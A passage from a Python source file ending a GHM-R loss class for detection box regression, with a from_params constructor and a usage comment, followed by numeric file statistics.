        loss = loss * weights
        loss = loss.sum() / tot
        return loss * self.loss_weight
    @classmethod
    def from_params(cls, params):
        mu = params['mu']
        bins = params['bins']
        momentum = params['momentum']
        loss_weight = params['loss_weight']
        return cls(mu, bins, momentum, loss_weight)
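# Minimal usage sketch (parameter values and tensor names are illustrative):
#   ghmr = GHMRLoss.from_params({'mu': 0.02, 'bins': 10, 'momentum': 0.75,
#                                'loss_weight': 1.0})
#   loss = ghmr(loc_pred, loc_target, anchor_mask)
# where loc_pred and loc_target are [B, A, 4] and anchor_mask is [B, A].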
| 35.043147
| 127
| 0.599768
| 7,140
| 0.517129
| 0
| 0
| 442
| 0.032013
| 0
| 0
| 2,536
| 0.183675
|